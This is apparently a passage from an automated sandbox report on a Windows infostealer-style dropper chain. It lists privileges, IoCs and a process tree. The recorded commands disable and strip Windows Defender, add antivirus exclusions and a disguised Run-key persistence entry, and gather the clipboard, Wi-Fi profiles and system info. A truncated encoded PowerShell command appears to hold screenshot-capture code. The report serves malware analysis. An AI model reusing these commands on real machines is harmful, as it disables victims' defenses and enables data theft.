Token: SeSystemtimePrivilege	312	WMIC.exe
Token: SeProfSingleProcessPrivilege	312	WMIC.exe
Token: SeIncBasePriorityPrivilege	312	WMIC.exe
Token: SeCreatePagefilePrivilege	312	WMIC.exe
Token: SeBackupPrivilege	312	WMIC.exe
Token: SeRestorePrivilege	312	WMIC.exe
Token: SeShutdownPrivilege	312	WMIC.exe
Token: SeDebugPrivilege	312	WMIC.exe
Token: SeSystemEnvironmentPrivilege	312	WMIC.exe
Token: SeRemoteShutdownPrivilege	312	WMIC.exe
Token: SeUndockPrivilege	312	WMIC.exe
Token: SeManageVolumePrivilege	312	WMIC.exe
Token: 33	312	WMIC.exe
Token: 34	312	WMIC.exe
Token: 35	312	WMIC.exe
Token: 36	312	WMIC.exe
Token: SeDebugPrivilege	2252	tasklist.exe
Token: SeDebugPrivilege	1092	powershell.exe
Token: SeDebugPrivilege	4984	powershell.exe
Token: SeIncreaseQuotaPrivilege	4152	powershell.exe
Token: SeSecurityPrivilege	4152	powershell.exe
Token: SeTakeOwnershipPrivilege	4152	powershell.exe
Token: SeLoadDriverPrivilege	4152	powershell.exe
Token: SeSystemProfilePrivilege	4152	powershell.exe
Token: SeSystemtimePrivilege	4152	powershell.exe
Token: SeProfSingleProcessPrivilege	4152	powershell.exe
Token: SeIncBasePriorityPrivilege	4152	powershell.exe
Token: SeCreatePagefilePrivilege	4152	powershell.exe
Token: SeBackupPrivilege	4152	powershell.exe
Token: SeRestorePrivilege	4152	powershell.exe
Token: SeShutdownPrivilege	4152	powershell.exe
Token: SeDebugPrivilege	4152	powershell.exe
Token: SeSystemEnvironmentPrivilege	4152	powershell.exe
Token: SeRemoteShutdownPrivilege	4152	powershell.exe
Token: SeUndockPrivilege	4152	powershell.exe
Token: SeManageVolumePrivilege	4152	powershell.exe
Token: 33	4152	powershell.exe
Token: 34	4152	powershell.exe
Token: 35	4152	powershell.exe
Token: 36	4152	powershell.exe
Token: SeIncreaseQuotaPrivilege	2360	powershell.exe
Token: SeSecurityPrivilege	2360	powershell.exe
Token: SeTakeOwnershipPrivilege	2360	powershell.exe
Token: SeLoadDriverPrivilege	2360	powershell.exe
Token: SeSystemProfilePrivilege	2360	powershell.exe
Token: SeSystemtimePrivilege	2360	powershell.exe
Token: SeProfSingleProcessPrivilege	2360	powershell.exe
Token: SeIncBasePriorityPrivilege	2360	powershell.exe
Token: SeCreatePagefilePrivilege	2360	powershell.exe
Token: SeBackupPrivilege	2360	powershell.exe
Token: SeRestorePrivilege	2360	powershell.exe
Token: SeShutdownPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeSystemEnvironmentPrivilege	2360	powershell.exe
Token: SeRemoteShutdownPrivilege	2360	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exedwm.exe

pid	process
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
976	dwm.exe
976	dwm.exe
4944	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exe

pid	process
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe
4944	taskmgr.exe

Suspicious use of SetWindowsHookEx 22 IoCs

Processes:

Update.exeExplorer.EXEhl.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exehl.exe

pid	process
6800	Update.exe
3376	Explorer.EXE
3376	Explorer.EXE
3376	Explorer.EXE
3376	Explorer.EXE
3376	Explorer.EXE
3376	Explorer.EXE
3376	Explorer.EXE
3376	Explorer.EXE
3376	Explorer.EXE
3376	Explorer.EXE
6900	hl.exe
3984	MicrosoftEdge.exe
7992	MicrosoftEdgeCP.exe
6992	MicrosoftEdgeCP.exe
7992	MicrosoftEdgeCP.exe
6900	hl.exe
6900	hl.exe
6900	hl.exe
4128	hl.exe
4128	hl.exe
4128	hl.exe

Suspicious use of UnmapMainImage 10 IoCs

Processes:

ApplicationFrameHost.exe

pid	process
3740	ApplicationFrameHost.exe
3740	ApplicationFrameHost.exe
3740	ApplicationFrameHost.exe
3740	ApplicationFrameHost.exe
3740	ApplicationFrameHost.exe
3740	ApplicationFrameHost.exe
3740	ApplicationFrameHost.exe
3740	ApplicationFrameHost.exe
3740	ApplicationFrameHost.exe
3740	ApplicationFrameHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup.exesetup.execmd.exeBuild.exebased.exehacn.exehacn.exebased.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3096 wrote to memory of 5068	3096	setup.exe	setup.exe
PID 3096 wrote to memory of 5068	3096	setup.exe	setup.exe
PID 5068 wrote to memory of 1872	5068	setup.exe	cmd.exe
PID 5068 wrote to memory of 1872	5068	setup.exe	cmd.exe
PID 1872 wrote to memory of 4248	1872	cmd.exe	Build.exe
PID 1872 wrote to memory of 4248	1872	cmd.exe	Build.exe
PID 1872 wrote to memory of 4248	1872	cmd.exe	Build.exe
PID 4248 wrote to memory of 1432	4248	Build.exe	hacn.exe
PID 4248 wrote to memory of 1432	4248	Build.exe	hacn.exe
PID 4248 wrote to memory of 1952	4248	Build.exe	based.exe
PID 4248 wrote to memory of 1952	4248	Build.exe	based.exe
PID 1952 wrote to memory of 2276	1952	based.exe	based.exe
PID 1952 wrote to memory of 2276	1952	based.exe	based.exe
PID 1432 wrote to memory of 816	1432	hacn.exe	hacn.exe
PID 1432 wrote to memory of 816	1432	hacn.exe	hacn.exe
PID 816 wrote to memory of 3364	816	hacn.exe	cmd.exe
PID 816 wrote to memory of 3364	816	hacn.exe	cmd.exe
PID 2276 wrote to memory of 2080	2276	based.exe	cmd.exe
PID 2276 wrote to memory of 2080	2276	based.exe	cmd.exe
PID 2276 wrote to memory of 1860	2276	based.exe	cmd.exe
PID 2276 wrote to memory of 1860	2276	based.exe	cmd.exe
PID 2276 wrote to memory of 2920	2276	based.exe	cmd.exe
PID 2276 wrote to memory of 2920	2276	based.exe	cmd.exe
PID 2276 wrote to memory of 3824	2276	based.exe	cmd.exe
PID 2276 wrote to memory of 3824	2276	based.exe	cmd.exe
PID 2080 wrote to memory of 2360	2080	cmd.exe	powershell.exe
PID 2080 wrote to memory of 2360	2080	cmd.exe	powershell.exe
PID 3824 wrote to memory of 4152	3824	cmd.exe	powershell.exe
PID 3824 wrote to memory of 4152	3824	cmd.exe	powershell.exe
PID 1860 wrote to memory of 2912	1860	cmd.exe	powershell.exe
PID 1860 wrote to memory of 2912	1860	cmd.exe	powershell.exe
PID 2920 wrote to memory of 1316	2920	cmd.exe	mshta.exe
PID 2920 wrote to memory of 1316	2920	cmd.exe	mshta.exe
PID 2276 wrote to memory of 2296	2276	based.exe	cmd.exe
PID 2276 wrote to memory of 2296	2276	based.exe	cmd.exe
PID 3364 wrote to memory of 2980	3364	cmd.exe	s.exe
PID 3364 wrote to memory of 2980	3364	cmd.exe	s.exe
PID 3364 wrote to memory of 2980	3364	cmd.exe	s.exe
PID 2296 wrote to memory of 392	2296	cmd.exe	tasklist.exe
PID 2296 wrote to memory of 392	2296	cmd.exe	tasklist.exe
PID 2276 wrote to memory of 2764	2276	based.exe	cmd.exe
PID 2276 wrote to memory of 2764	2276	based.exe	cmd.exe
PID 2276 wrote to memory of 1116	2276	based.exe	cmd.exe
PID 2276 wrote to memory of 1116	2276	based.exe	cmd.exe
PID 2276 wrote to memory of 2736	2276	based.exe	cmd.exe
PID 2276 wrote to memory of 2736	2276	based.exe	cmd.exe
PID 2276 wrote to memory of 3952	2276	based.exe	cmd.exe
PID 2276 wrote to memory of 3952	2276	based.exe	cmd.exe
PID 2276 wrote to memory of 1352	2276	based.exe	cmd.exe
PID 2276 wrote to memory of 1352	2276	based.exe	cmd.exe
PID 2276 wrote to memory of 1220	2276	based.exe	cmd.exe
PID 2276 wrote to memory of 1220	2276	based.exe	cmd.exe
PID 2276 wrote to memory of 4828	2276	based.exe	cmd.exe
PID 2276 wrote to memory of 4828	2276	based.exe	cmd.exe
PID 1116 wrote to memory of 1092	1116	cmd.exe	powershell.exe
PID 1116 wrote to memory of 1092	1116	cmd.exe	powershell.exe
PID 2764 wrote to memory of 312	2764	cmd.exe	WMIC.exe
PID 2764 wrote to memory of 312	2764	cmd.exe	WMIC.exe
PID 1220 wrote to memory of 2252	1220	cmd.exe	tasklist.exe
PID 1220 wrote to memory of 2252	1220	cmd.exe	tasklist.exe
PID 2736 wrote to memory of 2592	2736	cmd.exe	netsh.exe
PID 2736 wrote to memory of 2592	2736	cmd.exe	netsh.exe
PID 1352 wrote to memory of 4984	1352	cmd.exe	powershell.exe
PID 1352 wrote to memory of 4984	1352	cmd.exe	powershell.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:564
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:976

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:640

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:724

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:912

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:368

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:708

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:1032

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
- Drops file in System32 directory
PID:1040

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1096
- c:\windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3184
- C:\Program Files\Google\Chrome\updater.exe
  "C:\Program Files\Google\Chrome\updater.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4796

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1168

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1212

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1320

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1328

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1336

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1380
- c:\windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:3104

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1496

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1532

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1548

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1588

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
- Modifies Internet Explorer settings
PID:1688
- C:\Windows\system32\AUDIODG.EXE
  C:\Windows\system32\AUDIODG.EXE 0x418
  2⤵
  PID:1772

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1712

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1820

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1828

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1836

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1912

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1388

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:2084

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2100

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
- Enumerates connected drives
PID:2324

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2444

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2452

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2524

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2532

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2580

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2612

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2656

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2676

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2880

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:3116

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3224

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3376
- C:\Users\Admin\AppData\Local\Temp\setup.exe
  "C:\Users\Admin\AppData\Local\Temp\setup.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3096
- - C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:5068
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI30962\Build.exe -pbeznogym
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1872
    - - C:\Users\Admin\AppData\Local\Temp\_MEI30962\Build.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI30962\Build.exe -pbeznogym
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4248
      - C:\ProgramData\Microsoft\hacn.exe
        
        "C:\ProgramData\Microsoft\hacn.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1432
        
        C:\ProgramData\Microsoft\hacn.exe
        
        "C:\ProgramData\Microsoft\hacn.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI14322\s.exe -pbeznogym
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3364
        
        C:\Users\Admin\AppData\Local\Temp\_MEI14322\s.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI14322\s.exe -pbeznogym
        9⤵
        Executes dropped EXE
        
        PID:2980
        
        C:\ProgramData\main.exe
        
        "C:\ProgramData\main.exe"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:4192
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpD467.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpD467.tmp.bat
        11⤵
        
        PID:6300
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 4192"
        12⤵
        Enumerates processes with tasklist
        
        PID:6396
        
        C:\Windows\system32\find.exe
        
        find ":"
        12⤵
        
        PID:6404
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        12⤵
        Delays execution with timeout.exe
        
        PID:6500
        
        C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
        
        "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
        12⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:6800
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
        13⤵
        
        PID:7560
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
        14⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:7616
        
        C:\ProgramData\svchost.exe
        
        "C:\ProgramData\svchost.exe"
        10⤵
        Executes dropped EXE
        
        PID:2604
        
        C:\ProgramData\svchost.exe
        
        "C:\ProgramData\svchost.exe"
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5328
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:5524
        
        C:\ProgramData\setup.exe
        
        "C:\ProgramData\setup.exe"
        10⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        
        PID:3480
      - C:\ProgramData\Microsoft\based.exe
        
        "C:\ProgramData\Microsoft\based.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1952
        
        C:\ProgramData\Microsoft\based.exe
        
        "C:\ProgramData\Microsoft\based.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:2276
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2080
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2360
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2912
        
        C:\Program Files\Windows Defender\MpCmdRun.exe
        
        "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        9⤵
        Deletes Windows Defender Definitions
        
        PID:1520
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('No modules Found!', 0, 'No modules Found!', 32+16);close()""
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2920
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:2364
        
        C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('No modules Found!', 0, 'No modules Found!', 32+16);close()"
        9⤵
        
        PID:1316
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ .scr'"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ .scr'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4152
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2296
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:392
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2764
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:312
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1092
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1220
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2252
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:4828
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:1872
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2736
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        9⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2592
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        8⤵
        
        PID:3952
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        9⤵
        Gathers system information
        
        PID:820
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkA